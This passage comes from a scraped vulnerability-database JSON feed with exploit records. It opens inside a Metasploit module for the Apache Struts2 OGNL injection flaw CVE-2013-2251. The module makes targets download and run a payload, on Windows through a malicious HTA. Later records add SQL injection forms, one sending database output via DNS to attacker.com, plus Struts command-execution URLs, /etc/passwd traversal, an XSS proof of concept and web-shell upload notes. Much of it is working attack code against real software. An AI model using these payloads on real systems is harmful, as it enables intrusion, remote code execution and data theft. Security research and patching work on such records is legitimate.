or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(fname)\r\n\r\n #\r\n # chmod\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # execute\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit_windows\r\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\r\n @pl = build_hta\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # execute hta\r\n #\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? 
or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n end\r\n\r\n #\r\n # wait for payload download\r\n #\r\n wait_payload\r\n\r\n register_file_for_cleanup(@var_exename)\r\n end\r\n\r\n def exploit\r\n if target.name =~ /Automatic/\r\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\r\n my_target = auto_target\r\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\r\n else\r\n my_target = target\r\n end\r\n\r\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\r\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\r\n\r\n if my_target.name =~ /Linux/\r\n if datastore['PAYLOAD'] =~ /windows/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\r\n end\r\n exploit_linux\r\n elsif my_target.name =~ /Windows/\r\n if datastore['PAYLOAD'] =~ /linux/\r\n fail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\r\n end\r\n exploit_windows\r\n end\r\n end\r\n\r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @pl_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n # wait for the data to be sent\r\n def wait_payload\r\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\r\n\r\n waited = 0\r\n while (not @pl_sent)\r\n select(nil, nil, nil, 1)\r\n waited += 1\r\n if (waited > datastore['HTTP_DELAY'])\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request the ELF payload -- Maybe it 
can't connect back to us?\")\r\n end\r\n end\r\n end\r\n\r\n def build_hta\r\n var_shellobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj = rand_text_alpha(rand(5)+5);\r\n var_fsobj_file = rand_text_alpha(rand(5)+5);\r\n var_vbsname = rand_text_alpha(rand(5)+5);\r\n var_writedir = rand_text_alpha(rand(5)+5);\r\n\r\n var_origLoc = rand_text_alpha(rand(5)+5);\r\n var_byteArray = rand_text_alpha(rand(5)+5);\r\n var_writestream = rand_text_alpha(rand(5)+5);\r\n var_strmConv = rand_text_alpha(rand(5)+5);\r\n\r\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\r\n # even when executing it as an \"HTA\" application\r\n # The encoding code has been stolen from ie_unsafe_scripting.rb\r\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\r\n\r\n # Build the content that will end up in the .vbs file\r\n vbs_content = Rex::Text.to_hex(%Q|\r\nDim #{var_origLoc}, s, #{var_byteArray}\r\n#{var_origLoc} = SetLocale(1033)\r\n|)\r\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\r\n # for conversion with ADODB.Stream\r\n vbs_ary = []\r\n # The output of this loop needs to be as small as possible since it\r\n # gets repeated for every byte of the executable, ballooning it by a\r\n # factor of about 80k (the current size of the exe template). 
In its\r\n # current form, it's down to about 4MB on the wire\r\n @exe.each_byte do |b|\r\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\r\n end\r\n vbs_content << vbs_ary.join(\"\")\r\n\r\n # Continue with the rest of the vbs file;\r\n # Use ADODB.Stream to convert from an ansi string to its byteArray equivalent\r\n # Then use ADODB.Stream again to write the binary to file.\r\n #print_status(\"Finishing vbs...\");\r\n vbs_content << Rex::Text.to_hex(%Q|\r\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\r\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\r\n\r\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\r\n\r\n#{var_strmConv}.Type = 2\r\n#{var_strmConv}.Charset = \"x-ansi\"\r\n#{var_strmConv}.Open\r\n#{var_strmConv}.WriteText s, 0\r\n#{var_strmConv}.Position = 0\r\n#{var_strmConv}.Type = 1\r\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\r\n\r\nSetLocale(#{var_origLoc})|)\r\n\r\n hta = <<-EOS\r\n <script>\r\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\r\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\r\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\r\n\r\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\r\n #{var_fsobj_file}.Close();\r\n\r\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\r\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\r\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\r\n window.close();\r\n </script>\r\n EOS\r\n\r\n return hta\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://0day.today/exploit/21032"}, {"lastseen": "2018-02-10T11:18:22", "bulletinFamily": "exploit", "description": "Orbit Open Ad Server version 1.1.0 suffers from a remote SQL injection vulnerability.", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "1337DAY-ID-22127", "href": "https://0day.today/exploit/description/22127", "type": "zdt", "title": "Orbit Open Ad Server 1.1.0 SQL Injection Vulnerability", "sourceData": "Product: Orbit Open Ad Server\r\nVendor: OrbitScripts, LLC\r\nVulnerable Version(s): 1.1.0 and probably prior\r\nTested Version: 1.1.0\r\nAdvisory Publication: March 19, 2014 [without technical details]\r\nVendor Notification: March 19, 2014 \r\nVendor Patch: March 21, 2014 \r\nPublic Disclosure: April 9, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-2540\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website.\r\n\r\n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540\r\n\r\nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request asking for the IP address of the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name whose DNS server is controlled by the attacker):\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database:\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input 
type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Orbit Open Ad Server 1.1.1\n\n# 0day.today [2018-02-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22127"}], "f5": [{"lastseen": "2016-09-26T17:22:57", "bulletinFamily": "software", "description": "Recommended action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n", "modified": "2014-05-16T00:00:00", "published": "2014-01-20T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "id": "SOL14933", "type": "f5", "title": "SOL14933 - Apache Struts vulnerability CVE-2013-2251", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:41:13", "bulletinFamily": "exploit", "description": "CVE-2013-2251\r\nStruts2 is the second-generation Java enterprise web application framework based on the Model-View-Controller 
(MVC) model. It is the product of the merger of the WebWork and Struts communities.\r\n\r\nThe action:, redirect: and redirectAction: prefix parameters of Apache Struts2 use OGNL expressions to implement their functionality and concatenate content submitted by the user via the URL into the OGNL expression. An attacker can therefore execute arbitrary Java code, and thus arbitrary commands, by constructing a malicious URL.\r\n\r\nThe redirect: and redirectAction: prefixes are enabled by default in Struts; all Struts versions below 2.3.15.1 are affected by this vulnerability.\r\n\r\nApache Struts2 has fixed this vulnerability in 2.3.15.1. Apache Struts2 users are strongly advised to check whether they are affected by this issue and to upgrade to the latest version as soon as possible.\r\n0\r\nApache Struts 2.0.0 - Apache Struts 2.3.15\r\nVendor status:\r\n==========\r\nThe vendor has released Apache Struts 2.3.15.1 to fix this security vulnerability; Struts users are advised to upgrade to the latest version promptly.\r\n\r\nVendor security advisory: S2-016\r\nLink: http://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\nSoftware upgrade page: http://struts.apache.org/download.cgi#struts23151", "modified": "2013-07-17T00:00:00", "published": "2013-07-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60906", "id": "SSV:60906", "title": "Apache Struts2 Multiple Prefix Parameter Remote Command Execution Vulnerability (CVE-2013-2251)", "type": 
"seebug", "sourceData": "\n Since Apache Struts2 has disabled the redirect parameter in the latest patched version 2.3.15.1, a system is affected by this vulnerability as long as the redirect function still works:\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:http://www.yahoo.com/\r\n\r\nIf the page redirects to www.yahoo.com, the current system is affected by this vulnerability.\r\n\r\nVerifying expression evaluation and command execution:\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60906"}, {"lastseen": "2017-11-19T17:32:53", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 65877\r\nCVE(CAN) ID: CVE-2014-1907\r\n\r\nThe WordPress VideoWhisper Live Streaming Integration software adds video broadcasting to WordPress sites and live video streams to blog pages.\r\n\r\nVideoWhisper Live Streaming Integration 4.27.3 and other versions do not effectively filter the \"s\" HTTP 
GET parameter in the script \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php\"; a remote attacker can exploit this vulnerability with directory traversal sequences to view arbitrary files on the target system. The \"s\" HTTP GET parameter in the script \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php\" is likewise not effectively filtered; a remote attacker can exploit this vulnerability with directory traversal sequences to delete arbitrary files on the target system. Successful exploitation of this vulnerability requires that the file \"/tmp/immuniweb\" exists on the system.\n0\nWordPress VideoWhisper Live Streaming Integration <= 4.27.3\nVendor patch:\r\n\r\nWordPress\r\n---------\r\nThe vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:\r\n\r\nhttps://wordpress.org/plugins/videowhisper-live-streaming-integration/screenshots/", "modified": "2014-03-03T00:00:00", "published": "2014-03-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61614", "id": "SSV:61614", "title": "WordPress VideoWhisper Live Streaming Integration Multiple Directory Traversal Vulnerabilities", "type": "seebug", "sourceData": "\n http://www.example.com/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\nhttp://www.example.com/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\n ", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61614"}, {"lastseen": "2017-11-19T17:31:32", "bulletinFamily": "exploit", "description": "Bugtraq ID:65866\r\nCVE 
ID:CVE-2014-1905\r\n\r\nWordPress is a blogging platform developed in PHP; users can set up their own blogs on servers that support PHP and a MySQL database.\r\n\r\nThe script \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php\" included in WordPress VideoWhisper Live Streaming Integration does not properly verify malicious file extensions when uploading files to the server, which allows a remote attacker to upload and execute arbitrary PHP files.\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\nVendor patch:\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5 has fixed this vulnerability; users are advised to download the update:\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61679", "id": "SSV:61679", "title": "WordPress VideoWhisper Live Streaming Integration Arbitrary File Upload Vulnerability", "type": "seebug", "sourceData": "\n After successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61679"}, {"lastseen": "2017-11-19T17:27:18", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0111\r\n\r\nApache 
Syncope is an open-source system for digital identity management in enterprise environments, implemented on JEE technology and released under the Apache 2.0 license.\r\n\r\nApache Syncope has a security vulnerability in its handling of specially crafted Apache Commons JEXL expressions, which allows authenticated remote attackers to execute arbitrary code via the JEE container running Apache Syncope core.\n0\nApache Syncope 1.0.0\r\nApache Syncope 1.0.8\r\nApache Syncope 1.1.0\r\nApache Syncope 1.1.6\nApache Syncope 1.0.9 and 1.1.7 have fixed this vulnerability; users are advised to download and use them:\r\nhttp://syncope.apache.org/", "modified": "2014-04-17T00:00:00", "published": "2014-04-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62214", "id": "SSV:62214", "title": "Apache Syncope Crafted Commons JEXL Expression Remote Code Execution Vulnerability", "type": "seebug", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:50", "bulletinFamily": "exploit", "description": "Bugtraq ID:66312\r\nCVE ID:CVE-2014-2219\r\n\r\nCMSimple is a lightweight open-source content management system.\r\n\r\nCMSimple does not properly filter the data of the \"d\" HTTP GET parameter passed to the \"/whizzywig/wb.php\" script, which allows an attacker to construct a malicious URI and entice a user to open it, thereby obtaining sensitive cookies, hijacking the session or performing malicious operations on the client side.\r\n0\r\nCMSimple 
3.54\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://sourceforge.net/projects/cmsimple-le/files/cmsimple_classic/", "modified": "2014-03-25T00:00:00", "published": "2014-03-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61903", "id": "SSV:61903", "title": "CMSimple '/whizzywig/wb.php'\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\n\r\nclass TestPOC(POCBase):\r\n vulID = 'SSV-61903' # vul ID\r\n version = '1'\r\n author = 'fenghh'\r\n vulDate = '2014-03-25'\r\n createDate = '2015-10-14'\r\n updateDate = '2015-10-14'\r\n references = ['http://sebug.net/vuldb/ssvid-61903']\r\n name = 'CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e'\r\n appPowerLink = 'www.cmsimple.dk'\r\n appName = 'cmsimple'\r\n appVersion = '3.54'\r\n vulType = 'XSS'\r\n desc = ''' \r\n \u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n \u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002\r\n '''\r\n # the sample sites for examine\r\n samples = ['']\r\n\r\n def _verify(self):\r\n output = Output(self)\r\n result = {}\r\n payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27sebug%27%29%3C/script%3E'\r\n verify_url = self.url + payload\r\n content = req.get(verify_url).content\r\n if '<script>alert(\"sebug\")</script>' in content:\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = verify_url\r\n output.success(result)\r\n else:\r\n output.fail('XSS 
Failed')\r\n return output\r\n\r\n def _attack(self): \r\n return self._verify()\r\n\r\nregister(TestPOC)\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61903"}, {"lastseen": "2017-11-19T17:31:07", "bulletinFamily": "exploit", "description": "CVE ID\uff1aCVE-2014-2024\r\n\r\nOpen Classifieds\u53ef\u4ee5\u7528\u6765\u521b\u5efa\u5206\u7c7b\u548c\u76ee\u5f55\u3002\r\n\r\n\u7531\u4e8e\u6ca1\u6709\u5145\u5206\u8fc7\u6ee4\u901a\u8fc7URI\u4f20\u9012\u5230"/shared-apartments-rooms/" URL\u7684\u7528\u6237\u63d0\u4f9b\u7684\u6570\u636e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u6b3a\u9a97\u767b\u5f55\u7528\u6237\u8bbf\u95ee\u6076\u610f\u94fe\u63a5\uff0c\u5e76\u5728\u53d7\u5f71\u54cd\u7f51\u7ad9\u4e0a\u4e0b\u6587\u7684\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002\n0\nOpen Classifieds 2-2.1.2\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOpen Classifieds\r\n-----\r\nOpen Classifieds 2-2.1.3\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\n\r\nhttps://github.com/open-classifieds/openclassifieds2/issues/556\r\nhttps://github.com/open-classifieds/openclassifieds2/commit/45ee8fb601a91b8a4238229580a32a4fd8d96ef9", "modified": "2014-03-13T00:00:00", "published": "2014-03-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61791", "id": "SSV:61791", "title": "Open Classifieds\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word:\r\n\r\nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22)</script>\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61791"}, {"lastseen": "2017-11-19T17:33:30", "bulletinFamily": "exploit", 
"description": "Bugtraq ID:65876\r\nCVE ID:CVE-2014-1906\r\n\r\nWordPress\u662f\u4e00\u79cd\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u652f\u6301PHP\u548cMySQL\u6570\u636e\u5e93\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u81ea\u5df1\u7684\u7f51\u5fd7\u3002\r\n\r\nWordPress VideoWhisper Live Streaming Integration\u5b58\u5728\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u6ce8\u5165\u6076\u610f\u811a\u672c\u6216HTML\u4ee3\u7801\uff0c\u5f53\u6076\u610f\u6570\u636e\u88ab\u67e5\u770b\u65f6\uff0c\u53ef\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u6216\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3002\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u66f4\u65b0\uff1a\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61677", "id": "SSV:61677", "type": "seebug", "title": "WordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T17:31:29", "bulletinFamily": "exploit", "description": "Bugtraq ID:65880\r\nCVE ID:CVE-2014-1908\r\n\r\nWordPress\u662f\u4e00\u79cd\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u652f\u6301PHP\u548cMySQL\u6570\u636e\u5e93\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u81ea\u5df1\u7684\u7f51\u5fd7\u3002\r\n\r\nWordPress VideoWhisper Live Streaming 
Integration\u591a\u4e2a\u811a\u672c\u4e0d\u6b63\u786e\u5b9e\u73b0\u9519\u8bef\u5904\u7406\u673a\u5236\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u63d0\u4ea4\u7279\u5236\u7684HTTP GET\u8bf7\u6c42\uff0c\u83b7\u53d6\u654f\u611f\u5e94\u7528\u4fe1\u606f\u3002\n0\nWordPress VideoWhisper Live Streaming Integration 4.27.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nWordPress\r\n-----\r\nWordPress VideoWhisper Live Streaming Integration 4.29.5\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u66f4\u65b0\uff1a\r\n\r\nhttp://wordpress.org/plugins/videowhisper-live-streaming-integration/", "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61678", "id": "SSV:61678", "title": "WordPress VideoWhisper Live Streaming Integration\u591a\u4e2a\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n The following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\n ", "cvss": {"score": 5.0, "vector": 